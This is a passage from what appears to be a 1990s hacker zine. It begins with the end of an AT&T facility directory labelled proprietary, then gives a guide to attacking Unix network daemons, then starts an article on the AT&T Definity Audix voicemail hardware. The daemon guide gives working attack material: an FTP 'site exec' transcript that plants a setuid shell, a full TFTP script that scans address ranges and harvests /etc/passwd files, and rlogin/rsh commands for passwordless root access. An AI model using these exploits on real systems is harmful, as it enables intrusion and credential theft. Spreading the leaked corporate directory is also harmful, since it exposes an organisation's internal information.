AT&T 400 S. WOODS MILL RD. CHSTRFLD MO 63107 314-275-1400
AT&T 424 S. WOODS MILL RD. CHSTRFLD MO 63107 314-469-2500
KANSAS CITY WORKS 777 N. BLUE PKWY LEESSUMMIT MO 64063 816-251-4000
KANSAS CITY AMO 1100 WALNUT ST. KANSASCITY MO 64141 816-654-4000
NC WORKS 3300 LEXINGTON RD. S.E. WIN-SALEM NC 27102 919-784-1110
REYNOLDA RD. (DDO) 2400 REYNOLDA RD. WIN-SALEM NC 27106 919-727-3100
BURLINGOTN NC 204 GRAHAM-HOPEDALE RD. BURLINGTON NC 27215 919-228-3000
GUILFORD CTR. I-85 MT HOPE CHURCH RD. MCLEANSVLE NC 27301 919-279-7000
NS 1701 PINECROFT RD. GREENSBORO NC 27407 919-855-2775
AT&T 7031 ALBERT PICK RD., SUITE 300 GREENSBORO NC 27409 919-668-1800
AT&T ENGR. 3330 W. FRIENDLY AVE. GREENSBORO NC 27410 919-379-5301
AT&T MICROELECT. SALES 5400 GLENWOOD RD. RALEIGH NC 27612 919-881-8023
AT&T 6701-A NORTHPARK BLVD. CHARLOTTE NC 28216 704-597-3050
AT&T 2 CENTRAL PARK PLAZA OMAHA NE 68102 402-595-5001
OMAHA AMO 222 S. 15th.ST, SUITE 200 S. OMAHA NE 68124 402-595-5001
OMAHA WORKS 120 & 1 ST OMAHA NE 68137 402-691-3000
AT&T 10843 OLD MILL RD OMAHA NE 68154 402-334-6000
AT&T 4 BEDFORD FARMS BEDFORD NH 03102 603-623-6100
SIMPLEX WIRE (TYCO LABS) 2073 WOODBURY AVE. NEWINGTON NH 03801 603-436-6100
PARSIPPANY 260 CHERRY HILL RD. PARSIPPANY NJ 07054 201-299-3000
PARSIPPANY 4 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-428-7700
PARSIPPANY CP 5 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-581-3000
AT&T 99 JEFFERSON RD. WOODHOLLOW III PARSIPPANY NJ 07054 201-581-5600
AT&T 4 CAMPUS DRIVE PARSIPPANY NJ 07054 201-829-1000
AT&T 700 LANIDEX PLAZA PARSIPPANY NJ 07054 201-884-7000
AT&T 1515 RTE 10 PARSIPPANY NJ 07054 201-993-4200
LIBERTY CORNER 184 LIBERTY CORNER RD WARREN NJ 07060 201-580-4000
AT&T-BL WARREN SRVC. CTR. 5 REINMAN RD. WARREN NJ 07060 201-756-1527
CLARK SHOPS 100 TERMINAL AVE. CLARK NJ 07066 201-396-4000
SHORT HILLS BELL LABS 101 JFK PKWY SHORTHILLS NJ 07078 201-564-2000
AT&T 5000 HADLEY RD SO.PLNFLD NJ 07080 201-668-3200
QUALITY MGMT ENGIN. 650 LIBERTY AVE. UNION NJ 07083 201-851-3333
AT&T 1480 ROUTE 9 N. WOODBRIDGE NJ 07095 201-750-3100
TWO GATEWAY CTR. NEWARK NJ 07102 201-468-6000
FREEHOLD AT&T JUNIPER PLAZA RT.9 FREEHOLD NJ 07728 201-577-5000
AT&T-BL CRAWFORD HILL KEYPORT RD. HOLMDEL NJ 07733 201-888-7000
AT&T-BL CRAWFORDS CORNER RD HOLDMEL NJ 07733 201-957-2000
AT&T 307 MIDDLETOWN-LINCROFT RD. LINCROFT NJ 07738 201-576-4000
RED HILL-BL 480 RED HILL RD MIDDLETOWN NJ 07748 201-949-3000
AT&T 200 LAUREL AVE MIDDLETOWN NJ 07748 201-957-2000
W. LONG BRANCH 185 MONMOUTH PKWY W.LG.BRNCH NJ 07764 201-870-7000
SUMMIT 190 RIVER RD. SUMMIT NJ 07901 201-522-6555
AT&T 233 MT. AIRY RD BSK RDGE NJ 07920 201-204-4000
AT&T 188 MT. AIRY RD BSK RDGE NJ 07920 201-221-2000
BASKING RIDGE 295 NO. MAPLE AVE. BSK RDGE NJ 07920 201-221-2000
AT&T 131 MORRISTOWN RD BSK RDGE NJ 07920 201-953-3900
AT&T RMC 222 MT. AIRY RD BSK RDGE NJ 07920 201-953-5300
AT&T INTNAT'L MT. KEMBLE AVE BSK RDGE NJ 07920 201-953-7000
AT&T-COMM. TR. 202-206N. BEDMINSTER NJ 07921 201-234-4000
BERKELEY HEIGHTS 1 OAK WAY BRKLY HGTS NJ 07922 201-771-2000
BERKELEY HEIGHTS 2 OAK WAY BRKLY HGTS NJ 07922 201-771-2000
BERNARDSVILLE 4 ESSEX AVE BERNARDSVL NJ 07924 201-204-2701
AT&T-BL NORTH RD CHESTER NJ 07930 201-879-3400
MT. KEMBLE PLAZA 340 RTE. 202 S. MORRISTOWN NJ 07960 201-326-2000
AT&T CAPITAL CORP. 44 WHIPPANY RD. MORRISTOWN NJ 07960 201-397-3000
MORRISTOWN AMO 111 MADISON AVE. MORRISTOWN NJ 07960 201-631-3700
AT&T 412 MOUNT KEMBLE AVE. MORRISTOWN NJ 07960 201-644-6000
AT&T 60 COLUMBIA TRNPK MORRISTOWN NJ 07960 201-829-7200
MORRIS BELL LABS 25 LINDSLEY DR. MORRISTOWN NJ 07960 201-898-1000
AT&T 1 SPEEDWELL AVE. MORRISTOWN NJ 07960 201-898-2000
AT&T 1776 ON THE GREEN MORRISTOWN NJ 07960 201-898-6000
AT&T 100 SOUTHGATE PARKWAY MORRISTOWN NJ 07960 201-898-8000
SOUTH GATE 475 SOUTH ST. MORRISTOWN NJ 07962 201-606-2000
MURRAY HILL 600 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-582-3000
AT&T-T 40 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-665-7000
WHIPPANY BELL LABS WHIPPANY RD WHIPPANY NJ 07981 201-386-3000
PENNSAUKEN SUP. 1077 THOM. BUSH MEM. HWY PENNSAUKEN NJ 08110 609-488-9020
HOPEWELL-ERC CARTER RD. HPWL TNSHP NJ 08525 609-639-1234
HOPEWELL-CEC CARTER RD. HPWL TNSHP NJ 08525 609-639-4500
AT&T 29-C EMMONS DRIVE PRINCETON NJ 08540 609-987-3000
LAWRENCEVILLE-CEC 3131 PRINCETON OFC PK LRNCVLLE NJ 08648 609-896-4000
AT&T COMM (IMS) 1300 WHITE HOUSE TRENTON NJ 08690 609-581-1000
AT&T 745 RT 202/206N BRIDGEWATR NJ 08807 201-231-6000
AT&T 95 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-5000
AT&T MARKTG CTR 55 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-6000
AT&T 485 U.S. ROUTE 1 S., PKWY TOWERS ISELIN NJ 08830 201-855-8000
AT&T 80 NORTHFIELD AVE. EDISON NJ 08837 201-225-8700
AT&T 20 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-1028
AT&T 30 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-2000
AT&T 180 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-6000
AT&T CORP ED. 140 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-7000
AT&T 371 HOES LN. PISCATAWAY NJ 08854 201-463-2200
AT&T 242 OLD NEW BRUNSWICK RD PISCATAWAY NJ 08854 201-562-6900
AT&T 100 ATRIUM WAY SOMERSET NJ 08873 201-560-1300
AT&T PIXEL MACHINES 1 EXEC.DR. SOMERSET NJ 08873 201-563-2200
HOLMDEL-BL CRAWFORDS CORNER RD HOLMDEL NJ 07733 201-949-3000
AT&T 1001 MENAUL BLVD. N.E. B345 ALBUQURQUE NM 87107 505-761-6300
SANDIA NAT'L LABS 1515 EUBANK BLVD. S.E. ALBUQURQUE NM 87123 505-844-5678
AT&T 220 EDISON WAY RENO NV 89502 702-239-7015
AT&T ENVIRON SAFETY 32 AVE. OF AMERICAS NEW YORK NY 10013 212-219-6396
AT&T-NYC 22 CORTLANDT ST. NEW YORK NY 10017 212-393-9800
550 MADISON AVE. NEW YORK NY 10022 212-605-5500
NS ONE PENN PLAZA SUITE 5420 NEW YORK NY 10119 212-714-5900
AT&T 2 MANHATTANVILLE RD. PURCHASE NY 10577 914-251-0700
SUFFERN MMC 22 HEMION RD. SUFFERN NY 10901 914-577-6600
AT&T 520 BROAD HOLLOW RD. MELVILLE NY 11747 516-420-3000
ALBANY 11 26 AVIATION RD. ALBANY NY 12205 518-489-4615
AT&T 16 CORPORATE WOODS BLVD. ALBANY NY 12211 518-447-6900
AT&T 2 JEFFERSON PLAZA, FLR 2 POUGHKEPSE NY 12601 914-485-7744
AT&T MARKETING 6597 KINNE RD SYRACUSE NY 13214 315-445-3800
AT&T 300 PEARL ST. OLYMPIA TOWERS BUFFALO NY 14202 716-849-6000
BUFFALO INSTALL. 25 JOHN GLENN DR. AMHERST NY 14228 716-691-2711
AT&T 1 MARINE MIDLAND PLZ. ROCHESTER NY 14604 716-777-4400
CET 5151 BLAZER MEM. PKWY DUBLIN OH 43017 614-764-5454
COLUMBUS WORKS 6200 E. BROAD ST. COLUMBUS OH 43213 614-860-2000
AT&T ONE SEAGATE, SUITE 750 TOLEDO OH 43604 419-245-3700
AT&T-NS 55 ERIEVIEW PLAZA 4TH FL. CLEVELAND OH 44114 216-664-6500
ADP 7007 E. PLEASANT VALLEY INDEPNDNCE OH 44131 216-447-1980
NAT'L ACCOUNT 1 FIRST NAT'L PLAZA DAYTON OH 44502 513-449-7800
AT&T 7725 W. RENO AVE. OK. CITY OK 73126 405-491-3000
AT&T LGE BUS. MACHINES 2020 S.W. 4TH AVE. PORTLAND OR 97201 503-295-5000
AT&T MICROELECT 1220 SW GREENBURGH RD PORTLAND OR 97223 503-244-3883
AT&T COMMERCE CT. 4 STATION SQ. SUITE 770 PITTSBURGH PA 15219 412-338-4800
AT&T 4 GATEWAY CTR. SUITE 500 PITTSBURGH PA 15222 412-392-8200
AT&T 470 STREETS RUN RD. PITTSBURGH PA 15236 412-882-1845
HARRISBURG 2080 LINGLESTOWN RD. HARRISBURG PA 17110 717-540-7251
ALLENTOWN-BETHLEHEM 2255 AVE. A BETHLEHEM PA 18018 215-861-2700
AT&T-BL STC RT 222 BREINIGSVL PA 18103 215-391-2000
AT&T MICROELECT. 961 MARCON BLVD. ALLENTOWN PA 18103 215-266-2900
ALLENTOWN-BL 1247 SO. CEDAR CREST BLVD. ALLENTOWN PA 18103 215-770-2200
AT&T 1 IMPERIAL WAY 2ND FL. ALLENTOWN PA 18195 215-398-5800
AT&T 3 BALA PLAZA WEST BLDG. BALA CYNWD PA 19004 215-581-2400
AT&T 514 KAISER DR. FOLCROFT PA 19032 215-724-5250
AT&T 1800 JFK BLVD., SUITE 1300 PHILADELPH PA 19103 215-972-1300
KING OF PRUSSIA 601 ALLENDALE RD. KING OF PR PA 19406 215-768-2600
READING WORKS 2525 N. 12TH ST. READING PA 19604 215-939-7011
AT&T NASSAU RECYCLE 4201 W. COLUMBIA CASEY SC 29033 803-796-4720
AT&T 1201 MAIN ST. 22ND FL. COLUMBIA SC 29201 803-733-3800
AT&T 111 WESTWOOD PL. 3RD FL. BRENTWOOD TN 37027 615-377-4000
AT&T MICROELECT. 195 POLK AVE. NASHVILLE TN 37211 615-749-8222
AT&T REPAIR CTR 653 MAINSTREAM DR. NASHVILLE TN 37228 615-242-1950
NASHVILLE MSL 566 MAINSTREAM DR. NASHVILLE TN 37228 615-256-4111
AT&T 9041 EXECUTIVE PARK KNOXVILLE TN 37923 615-690-3400
AT&T-NS SALES 909 E.LAS COLINAS BLVD IRVING TX 75039 214-401-4700
DALLAS WORKS 3000 SKYLINE DRIVE MESQUITE TX 75149 214-284-2000
AT&T-NS 1201 MAIN ST. SUITE 2555 DALLAS TX 75202 214-745-4790
AT&T 5525 LBJ FREEWAY DALLAS TX 75240 214-308-2000
AT&T 2501 PARKVIEW DR., SUITE 200 FT.WORTH TX 76102 817-870-4400
AT&T-NS 2900 N. LOOP WEST HOUSTON TX 77092 713-956-4400
AT&T CITYVIEW 10999 IH 10 W SAN ANTON TX 78230 512-691-5700
AT&T 5444 S. STAPLES CORPUS CHR TX 78411 512-994-4400
AT&T 8911 CAP. OF TEX HGHWY AUSTIN TX 78759 512-343-3000
AT&T 415 WEST 8TH ST. SUITE 307 AMARILLO TX 79101 806-374-9435
AT&T-BMG 3000 N. GARFIELD SUITE 180 MIDLAND TX 79705 915-687-8700
AT&T-NS 10521 ROSEHAVEN ST. FAIRFAX VA 22030 703-352-0900
AT&T-NS 12450 FAIR LAKES CIRCLE FAIRFAX VA 22033 703-631-3288
AT&T-BELL LABS 1201 S. HAYES ST. ARLINGTON VA 22202 703-769-8900
AT&T 1550 WILSON BLVD. ARLINGTON VA 22209 703-247-4690
AT&T FED SYS 1201 S. HAYES ST. ARLINGTON VA 22209 703-685-8678
AT&T MAJOR MKT & SALES 600 EAST BROAD ST. RICHMOND VA 23219 804-775-3300
AT&T OSO 1530 E. RUN RD. RICHMOND VA 23228 804-262-4062
RICHMOND WORKS 4500 S. LABURNUM AVE. RICHMOND VA 23231 804-226-5000
AT&T 1338 PLANTATION RD NE ROANOKE VA 24012 703-344-1160
NEW RIVER VALLEY CALLER 21 RADFORD VA 24143 703-731-8000
AT&T 2901 THIRD AVE. SEATTLE WA 98121 206-443-7000
AT&T ACCT MGMT 2121 4TH AVE. SEATTLE WA 98121 206-728-4749
AT&T N. 9 POST SUITE 330 SPOKANE WA 99201 509-747-6110
AT&T 400 S. EXECUTIVE DR. BROOMFIELD WI 53005 414-785-9110
MILWAUKEE CP/ASSEM.CTR MILWAUKEE WI 53212 414-963-8200
AT&T 2802 INTERNAT'L LN, 2ND FLR MADISON WI 53704 608-241-8900
AT&T 900 PENNSYLVANIA AVE. CHARLESTON WV 25302 304-347-2000
MARTINSBURG MMC TABLER STA.RD. MARTINSBRG WV 25401 304-263-6931
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
And remember...
All directory information is classified AT&T Proprietary and, as such, should
be safeguarded as outlined in GEI 2.2. Responsibility for security is passed
on to each employee receiving the directory.
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
Playing with the Internet Daemons
by
Voyager [TNO]
Internet hosts communicate with each other using either TCP
(Transmission Control Protocol) or UDP (User Datagram Protocol) on top
of IP (Internet Protocol). Other protocols are used on top of IP, but
TCP and UDP are the ones that are of interest to us. On a Unix system,
the file /etc/protocols will list the available protocols on your
machine
On the Session Layer (OSI model) or the Internet Layer (DOD Protocol
Model) data is moved between hosts by using ports. Each data
communication will have a source port number and a destination port
number. Port numbers can be divided into two types, well-known ports
and dynamically allocated ports. Under Unix, well-known ports are
defined in the file /etc/services. In addition, RFC (Request For
Comments) 1700 "Assigned Numbers" provides a complete listing of all
well-known ports. Dynamically allocated port numbers are assigned as
needed by the system.
Unix provides the ability to connect programs called daemons to
well-known ports. The remote computer will connect to the well-known
port on the host computer, and be connected to the daemon program.
Daemon programs are traditionally started by inetd (The Internet
Daemon). Daemon programs to be executed are defined in the inetd
configuration file, /etc/inetd.conf.
Most of these daemons run as a priveledged user, often as root. Many of
these programs have vulnerabilities which can be exploited to gain access
to remote systems.
The daemons we are interested in are:
Service Port Number Description
~~~~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ftp 21 File Transfer [Control]
smtp 25 Simple Mail Transfer Protocol
tftp 69 Trivial File Transfer Protocol
finger 79 Finger
www-http 80 World Wide Web HTTP
sunrpc 111 SUN Remote Procedure Call
fln-spx 221 Berkeley rlogind with SPX auth
rsh-spx 222 Berkeley rshd with SPX auth
netinfo 716-719 NetInfo
ibm-res 1405 IBM Remote Execution Starter
nfs 2049 Network File System
x11 6000-6063 X Window System
rcp/rshd Remote Copy/Remote Shell Daemon
nis Network Information Services
The next part of this article will focus on specific daemons and their
known vulnerabilities. The vulnerabilities with brief explanations will be
explained here. For the more complicated exploits, which are beyond the
scope of a concise article, more research will be required on the part of
the reader.
--> ftp 21 File Transfer [Control]
FTP is the File Transfer Protocol. FTP requests are answered by the FTP
daemon, ftpd. wuarchive's ftpd versions below 2.2 have a vulnerability
where you can execute any binary you can see with the 'site exec'
command by calling it with a relative pathname with "../" at the
beginning. Here is a sample exploit:
Login to the system via ftp:
220 uswest.com FTP server (Version wu-2.1(1) ready.
Name (uswest.com:waltman): waltman
331 Password required for waltman.
Password: jim
230 User waltman logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec cp /bin/sh /tmp/.tno"
200-cp /bin/sh /tmp/tno
ftp> quote "site exec chmod 6755 /tmp/.tno"
200-chmod 6755 /tmp/tno
ftp> quit
221 Goodbye.
--> smtp 25 Simple Mail Transfer Protocol
Mail attacks are one of the oldest known methods of attacking Internet
hosts. The most common mail daemon, and least secure, is sendmail. Other
mail daemons include smail, MMDF,and IDA sendmail. Sendmail has had too
many vulnerabilities to list them all. There is an entire FAQ written
specifically on sendmail vulnerabilities, therefore we will not cover them
heavily here.
One well known vulnerability, useful only for historical purposes, is
"Wizard Mode." In Wizard mode you could request a shell via Port 25
(The SMTP port). No modern system will be vulnerable to this attack. To
exploit this vulnerability, you telnetted to port 25, typed WIZ to enter
Wizard mode, and entered the password. The problem related to the way
the encrypted password was stored. There was a bug that caused the
system to believe that no password was as good as the real password.
To quote Steven Bellovin:
The intended behavior of wizard mode was that if you supplied
the right password, some other non-standard SMTP commands were
enabled, notably one to give you a shell. The hashed password
-- one-way encrypted exactly as per /etc/passwd -- was stored in
the sendmail configuration file. But there was this bug; to
explain it, I need to discuss some arcana relating to sendmail
and the C compiler.
In order to save the expense of reading and parsing the
configuration file each time, sendmail has what's known as a
``frozen configuration file''. The concept is fine; the
implementation isn't. To freeze the configuration file,
sendmail just wrote out to disk the entire dynamic memory area
(used by malloc) and the `bss' area -- the area that took up no
space in the executable file, but was initialized to all zeros
by the UNIX kernel when the program was executed. The bss area
held all variables that were not given explicit initial values
by the C source. Naturally, when delivering mail, sendmail just
read these whole chunks back in, in two giant reads. It was
therefore necessary to store all configuration file information
in the bss or malloc areas, which demanded a fair amount of care
in coding.
The wizard mode password was stored in malloc'ed memory, so it
was frozen properly. But the pointer to it was explicitly set
to NULL in the source:
char *wiz = NULL;
That meant that it was in the initialized data area, *not* the
bss. And it was therefore *not* saved with the frozen
configuration. So -- when the configuration file is parsed and
frozen, the password is read, and written out. The next time
sendmail is run, though, the pointer will be reset to NULL.
(The password is present, of course, but there's no way to find
it.) And the code stupidly believed in the concept of no
password for the back door.
One more point is worth noting -- during testing, sendmail did
the right thing with wizard mode. That is, it did check the
password -- because if you didn't happen to do the wizard mode
test with a frozen configuration file -- and most testing would
not be done that way, since you have to refreeze after each
compilation -- the pointer would be correct.
--> tftp 69 Trivial File Transfer Protocol
tftp is the Trivial File Transfer Protocol. tftp is most often used to
attempt to grab password files from remote systems. tftp attacks are so
simple and repetitive that scripts are written to automate the process
of attacking entire domains. Here is one such script:
#!/bin/sh
########################################################################
# TFTP snagger by Yo
# It snags /etc/passwd files from all hosts with open 69 (tftp) port.
# scans all hosts from XX.XX.0.0 - XX.XX.255.255
# you can run it in the background in following way:
# snag [hostname] > /dev/null &
# [hostname] might be used IP # (with -ip option) as well as FQDN
# Last Updated 10/20/92
#
# Highly modified by ThePublic on 10/21/92
########################################################################
case $1 in
'')
echo " Usage: $0 [hostname] to run in the foreground "
echo " $0 [hostname] > /dev/null & to run in the background "
echo " The [hostname] can be specialized in fully qualified domain name "
echo " i.e.- $0 nyx.cs.du.edu - and it'll scan all du.edu domain. "
echo " as well as IP with -ip option. "
exit 1
;;
-ip)
if [ $2x = x ]; then
echo " Usage: $0 $1 the IP "
exit 1
else
x=`echo $2 | cut -d. -f1`
xx=`echo $2 | cut -d. -f2`
xxx=`echo $2 | cut -d. -f3`
xxxx=`echo $2 | cut -d. -f4`
# ^ field delimiter is '.' -- get field 1/2/3/4
fi;;
*)
if [ ! -f /usr/ucb/nslookup ] && [ ! -f /usr/local/bin/nslookup ]; then
# -x is for SunOs
echo sorry dude, no nslookup server .. try it with -ip option.
exit 1
fi
x1=`nslookup $1 | fgrep "Address" | cut -c11-17 | tail -1`
# ^ 7 chars ^ last line
if [ "$x1" = '' ]; then
echo " There is no such domain. Nothing to scan. Exit. "
exit 1
fi
x=`echo $x1 | cut -d. -f1` # get the first set of #, ##, or ###
xx=`echo $x1 | cut -d. -f2` # get the second set
xxx=0 # ignore the rest, if any
xxxx=0
;;
esac
if [ $x -lt 1 ] || [ $x -ge 255 ] || [ $xx -lt 1 ] || [ $xx -ge 255 ]; then
echo There is no such domain. Nothing to scan.
exit 1
fi
while [ $x -ne 255 ]; do
while [ $xx -ne 255 ]; do
while [ $xxx -ne 255 ]; do
while [ $xxxx -ne 255 ]; do
target=$x.$xx.$xxx.$xxxx
trap "echo The Process was stopped at $target;rm -rf passwd.$target; exit 1" 2
tftp << EOF
c $target
mode ascii
trace
get /etc/passwd passwd.$target
quit
EOF
if [ ! -s passwd.$target ] ; then
rm -rf passwd.$target
echo `date` $target has rejected an attempt >> .info
else
mv passwd.$target .good.$target
echo `date` $target is taken, all data is stored in .good.$target file >> .info
fi
xxxx=`expr $xxxx + 1 `
done
xxxx=0
xxx=`expr $xxx + 1 `
done
xxx=0
xx=`expr $xx + 1 `
done
xx=0
x=`expr $x + 1 `
done
--> finger 79 Finger
The finger command displays information about another user, such as login
name, full name, terminal name, idle time, login time, and location if
known. finger requests are answered by the fingerd daemon.
Robert Tappan Morris's Internet Worm used the finger daemon. The finger
daemon allowed up to 512 bytes from the remote machine as part of the
finger request. fingerd, however, suffered from a buffer overflow bug
caused by a lack proper bounds checking. Anything over 512 got
interpreted by the machine being fingered as an instruction to be
executed locally, with whatever privileges the finger daemon had.
--> www-http 80 World Wide Web HTTP
HTML (HyperText Markup Language) allows web page user to execute
programs on the host system. If the web page designer allows the web
page user to enter arguments to the commands, the system is vulnerable
to the usual problems associated with system() type calls. In addition,
there is a vulnerability that under some circumstances will give you an
X-Term using the UID that the WWW server is running under.
--> sunrpc 111 SUN Remote Procedure Call
Sun RPC (Remote Procedure Call) allows users to execute procedures on
remote hosts. RPC has suffered from a lack of secure authentification.
To exploit RPC vulnerabilities, you should have a program called "ont"
which is not terribly difficult to find.
--> login 513 Remote login
Some versions of AIX and Linux suffer from a bug in the way that
rlogind reads arguments. To exploit this vulnerability, issue this
command from a remote system:
rlogin host -l -froot
Where host is the name of the target machine and username is the username
you would like to rlogin as (usully root). If this bug exists on the
hosts system, you will be logged in, without being asked for a password.
--> rsh-spx 222 Berkeley rshd with SPX auth
Some versions of Dynix and Irix have a bug in rshd that allows you to
run commands as root. To exploit this vulnerability, issue this command
from the remote system:
rsh host -l "" /bin/sh
--> netinfo 716-719 NetInfo
NeXT has implemented a protocol known as NetInfo so that one NeXT
machine can query another NeXT machine for information. A NetInfo
server will by default allow unrestricted access to system databases.
This can be fixed by the System Administrator. One of the pieces of
information netinfo will give up is the password file.
--> ibm-res 1405 IBM Remote Execution Starter
rexd (the remote execution daemon) allows you to execute a program on
another Unix machine. AIX, NeXT and HPUX versions of rexd have suffered
from a vulnerability allowing unintended remote execution. The rexd
daemon checks your uid on the machine you are coming from, therefore you
must be root on the machine you are mounting the rexd attack from. To
determine if your target machine is running rexd, use the 'rcp -p
<target>' command. You will also need the exploit program known as 'on'
which is available on fine H/P boards everywhere.
--> nfs 2049 Network File System
NFS, the Network File System, from Sun Microsystems has suffered from
multiple security vulnerabilities. In addition, many system
administrators configure NFS incorrectly, allowing unintended remote
access.
Using the command 'showmount -e <target>' you can view what file systems
are exported from a machine. Many administrators allow read access to
the /etc directory, allowing you to copy the password file. Other
administrators allow write access to user directories, allowing you to
create .rhosts files and gain access to the machine via rlogin or rsh.
In addition to configuration issues, NFS is vulnerable to attacks using
a uid masking bug, a mknod bug, and a general file handle guessing
attack. Several hacked versions of the mount command have been written
to exploit known vulnerabilities.
--> x11 6000-6063 X Window System
X-Windows has suffered and currently suffers from numerous
vulnerabilities. One vulnerability allows you to access another users
display, another allows you to view another users keystrokes. Another
vulnerability allows a remote attacker to run every program that the
root user starts in his or her .xsession file. Yet another X-Windows
vulnerability allows a local user to create a root entry in the
/etc/passwd file.
--> rcp
The SunOS 4.0.x rcp utility can be exploited by any trusted host listed
in /etc/hosts.equiv or /.rhosts. To exploit this hole you must be
running NFS (Network File System) on a Unix system or PC/NFS on a DOS
system.
--> NIS
Sun's NIS (Network Information Service) also known as yp (Yellow Pages)
has a vulnerability where you can request an NIS map from another NIS
domain if you know the NIS domain name of the target system. There is
no way to query a remote system for it's NIS domainname, but many NIS
domain names are easily guessable. The most popular NIS map to request
is passwd.byname, the NIS implementation of /etc/passwd. In addition,
if you have access to a diskless Unix workstation, you can determine the
NIS domain name of the server it boots from.
+--------------------------------------------------------+
+ Do not confuse NIS domain names with DNS domain names! |
+--------------------------------------------------------+
--> Other attacks
In addition to these daemon based attacks, many other methods can be
used to gain access to a remote computer. These include, but are not
limited to: default accounts, password guessing, sniffing, source
routing, DNS routing attacks, tcp sequence prediction and uucp
configuration exploits.
This should give you an idea on how daemon based attacks function. By
no means is this a complete list of security vulnerabilities in
privileged internet daemons. To discover more information about how
these daemons operate, and how to exploit their vulnerabilities, I
highly recommend reading source code, man pages and RFC's.
Voyager[TNO]
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
[][][][][][][][][][][][][][][][][][][][][][]
[[[ ]]]
[[[[ THE DEFINITY AUDIX VMS INSIDE OUT ]]]]
[[[[[ ]]]]]
[[[[[[[ by: Boba Fett ]]]]]]]
[[[[[[[[[[[ ]]]]]]]]]]]
[][][][][][][][][][][][][][][][][][][][][][]
- " What?! Another crummy file on the Audix voice mail? "
Not exactly. In COTNO #1, you will find a good article on identifying and
obtaining mailboxes on the Audix Voice Mail System (VMS). This paper will
discuss the physical/electrical design of the Audix System and how it's
integrated with the Definity switch. I will not discuss how to obtain
dialups to the audix or hacking it, that's another file :). Most of the
information and diagrams in this paper where gathered from various sources.
Mainly, the AT&T Tech. Journal may/june 1994, and some very cooperative AT&T
representatives. ;)
1) Hardware
-----------
All right, what does this baby look like? Well, all in all, it's quite simple.
There are 4 major components, all of which can be easily replaced or removed.
A tape drive, a hard disk and 2 circuit boards. Here's what the Definity Audix's
front panel looks like.
Disk/Alarm board MFB panel
.---------------------.__.-----.
| _______________ | | |
| | | | | o <----- Red LED
| | | | | |
| | ||| | | | O <---------- "Enter/yes" Button
| | ||| | | | __ |
Tape ----->| |||| | | | || |
Unit | | |||| | | | || |
| | ||| | | | || <----- Alphanumeric liquid
| | ||| | | | || | crystal display(10 character)
| | ||| | | | -- |
| --------------- | | O <---- "Next/no" button
| | | |
| | | |
Boot/ -----------------> O | | O <---- "Back" button
shutdown | | |Back |
button | .--------. | | |
| | Some | | | |
| | stupid | _ | | _ |
| | warning| | | | | | <-------------- Handles/
| | label. | | | | | | | | / latch
| |________| | <----------------
.________________|_|__|--|_|_|_|
As you can see, it consists of two boards: The multifunction board (right), and
the disk/alarm board (left).
o MFB major components:
- A 386 processor (supports Unix System V) with 16 megs of dynamic
RAM (DRAM).
- An array of six 50 mhz digital signal processors (DSPs).
- The Definity switch time-division multiplexed (TDM) bus interface.
- An alarm monitoring processor. :(
o D/ALB major components:
- A tape drive
- A Hard Drive
- An online modem for REMOTE ALARM NOTIFICATION, AND REMOTE MAINTENANCE.
The modem is included with the package. If the on-board modem does not
comply with the local telco rules (for example foreign countries) , than
through the RS-232 port an external one can be attached. Let's take a deeper
look inside and see where the components go.
.--------------------------------------.
/| + Disk/Alarm Board + |__Tip/Ring
.--------. / | .------------------remote acs ports--|___RS-232
| | / | | |
| | / | | .------|--------|--------Ethernet----- LAN
|S | / | | | Tape System Disk controller|
|W | / |_|__|_________________________________|
|I |/ |-|--|---------------------------------|
|T|======| | | | + Multifunction Board + |
|C| Audix| | | | |
|H|======| | | | /============== RS-232
| |\ | | SCSI 386 Serial Data Packet |
|________| \ | | Interface CPU async/sync. bus |--- Packet
\ | | -|-----------|-------|------inter- | Bus
\ | | | 16 Meg DMA face |
\ | Faceplate RAM | \ | |
\ | & Control | \ TDM |
\ | 3 DSP 32Cs---Interface|--- TD bus
\______________________________________|
o Explanation of some terms:
CPU: Central Processing Unit
DSP: Digital Signal Processor
TDM: Time-Division Multiplexed
DMA: Direct Memory Access
SCSI: Small Computer System Interface
The Definity Audix VMS is so compact because it has to fit in the Definity
PBX's port slot. It can: detect a incoming call, detect when the caller has
disconnected, disconnect a call on ANY port. It can also, disable any port to
prevent it from receiving incoming calls, and most important of all, it can
originate outgoing calls. It is also good to know that it has CLID.
Here's a list of it's functions:
- Call History Information (Called Party ID,Calling party ID and
reason for call).
- Integrated message waiting notification (LED).
- Disconnect message (Contact Administrator for help, please disconnect
goodbye).
- Message waiting status information (Updated on activity, Audit of
each vmb and refresh of all vmbs).
- Maintenance info. for link.
- Audix control of port. (disconnect call, detect caller, etc..)
I've been referring to it as the Definity Audix, and not just Audix. Audix,
(aka Audix release 1), was first introduced in 1984. The Definity Audix,
however, was introduced in 1992, and came with a series of more advanced
features. For example, the time scale modification option was improved, allowing
the playback of messages at slower or faster speeds. Or the speech
encoder/decoder algorithm which was changed resulting in better sound quality
(so they say). How can you tell if it's a Definity when calling it remotely?
Well, quite frankly I'm not sure. There is a way, however, it isn't very easy to
apply. The Audix, release 1 system takes approx. 1 second to detect your DTMF
tones. Now, the Definity, on the other hand, takes only about 25 milliseconds,
less than half the time. You can time the reaction, and figure out what your
dealing with, but there are many things that can affect the response time also
(for example, the amount of people using the voice mail). As you can see
this method isn't very reliable.
2) Software
-----------
